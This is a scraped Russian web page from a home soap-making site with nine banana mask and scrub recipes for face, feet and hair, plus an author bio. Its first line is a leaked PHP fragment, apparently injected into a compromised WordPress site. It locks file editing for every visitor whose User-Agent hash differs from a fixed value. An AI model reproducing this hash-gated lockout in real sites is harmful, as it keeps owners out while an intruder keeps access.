if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 9 рецептов домашней косметики с использованием бананов | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

9 рецептов домашней косметики с использованием бананов

Банан, который известен как лакомство животных и человека ещё и замечательное средство для красоты кожи. В нем содержится огромное количество полезных элементов!

Вкус­ный и полез­ный! О мно­гих фрук­тах мож­но напи­сать так. Банан, кото­рый изве­стен как лаком­ство живот­ных и чело­ве­ка ещё и заме­ча­тель­ное сред­ство для кра­со­ты кожи. Такой спи­сок богат­ства полез­ных эле­мен­тов, на кото­рые, сто­ит обра­тить внимание!

Банан богат вита­ми­на­ми из груп­пы «B», содер­жит вита­мин «С», спо­соб­ству­ю­щий умень­ше­нию преж­де­вре­мен­но­го обра­зо­ва­ния мор­щин. Важен для кожи вита­мин «E», под­дер­жи­ва­ю­щий тонус кожи. Мик­ро­эле­мент «K» улуч­ша­ет регу­ли­ро­ва­ние обме­на веществ.

Содер­жат­ся так­же и анти­ок­си­дан­ты, спо­соб­ству­ю­щие под­дер­жа­нию кол­ла­ге­но­вых воло­кон в дер­ме кожи. Очень важ­но, что мас­ка­ми из бана­на могут поль­зо­вать­ся обла­да­тель­ни­цы всех типов кожи. Это заме­ча­тель­ный уход за кожей лица!

При­ят­но отку­сить от пло­да, насла­дить­ся, да ещё и остав­шу­ю­ся часть исполь­зо­вать в соста­ве мас­ки. Для ухо­да за кожей лица мож­но вос­поль­зо­вать­ся мас­ка­ми, кото­рые лег­ко готовятся.

А вот и обещанные рецепты масок с бананами:

  1. 89963734_BananaMask1Пюре из бана­на сме­шать с жид­ким мёдом и нане­сти на лицо минут на два­дцать. Смыть тёп­лой водой.
  2. Кури­ный жел­ток, поло­ви­на бана­на, раз­мя­то­го в пюре, лож­ка йогур­та. При пере­ме­ши­ва­нии пре­вра­ща­ет­ся в заме­ча­тель­ную мас­ку. Нане­сти на 20 минут на лицо и смой­те. Мож­но делать такую мас­ку два раза в неделю.
  3. Раз в неде­лю при­ме­няй­те нату­раль­ный скраб. Сме­шай­те поло­ви­ну бана­на с неболь­шим коли­че­ством саха­ра. Нане­си­те на лицо, это будет допол­ни­тель­ное пита­ние. А затем хоро­шо прой­ди­тесь по мас­саж­ным лини­ям. Оро­го­вев­шие частич­ки хоро­шо отой­дут от эпи­дер­ми­са кожи.
  4. Раз­мять несколь­ко бана­нов и в каче­стве эмуль­га­то­ра налить лож­ки две олив­ко­во­го мас­ла. Смесь раз­ме­шай­те в при­го­тов­лен­ной ванне. Кожа после такой ван­ны будет неж­ной и бархатистой.
  5. Поло­ви­ну раз­мя­то­го бана­на сме­шать с неболь­шим коли­че­ством моло­ка, доба­вить немно­го порош­ка мускат­но­го оре­ха и овся­ных хло­пьев. Такой состав обла­да­ет бак­те­ри­цид­ны­ми свой­ства­ми и будет вашей лечеб­ной кос­ме­ти­кой в борь­бе с вос­па­ле­ни­я­ми и угрями.
  6. Каши­цу раз­мя­то­го бана­на нало­жить на ступ­ни. Надеть цел­ло­фа­но­вые паке­ты и нос­ки. Такую мас­ку для смяг­че­ния сухой кожи и тре­щин, хоро­шо делать на ночь. Утром опо­лос­нуть ноги тёп­лой водой.
  7. Кра­со­та лица без кра­со­ты волос немыс­ли­мы. Поэто­му несколь­ко сове­тов по при­ме­не­нию бана­на для улуч­ше­ния струк­ту­ры волос и внеш­не­го вида.
  8. Раз­мять два бана­на, пере­ме­шать с дву­мя лож­ка­ми мёда и нане­сти на влаж­ные чистые воло­сы. Хоро­шо мас­ка рабо­та­ет, если воло­сы накрыть поли­эти­ле­ном и поло­тен­цем. Дли­тель­ность мас­ки до 30 минут. Смыть каши­цу тёп­лой водой.
  9. Помо­жет умень­шить выпа­де­ние волос мас­ка бана­на с йогур­том. Банан раз­мять, пере­ме­шать с йогур­том и полу­чив­шу­ю­ся каши­цу нане­сти на влаж­ные воло­сы. Хоро­шо мас­си­ру­ем кожу голо­вы. Так же уку­тать голо­ву, как и в преды­ду­щем рецеп­те. Смыть тёп­лой водой через трид­цать минут.

И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!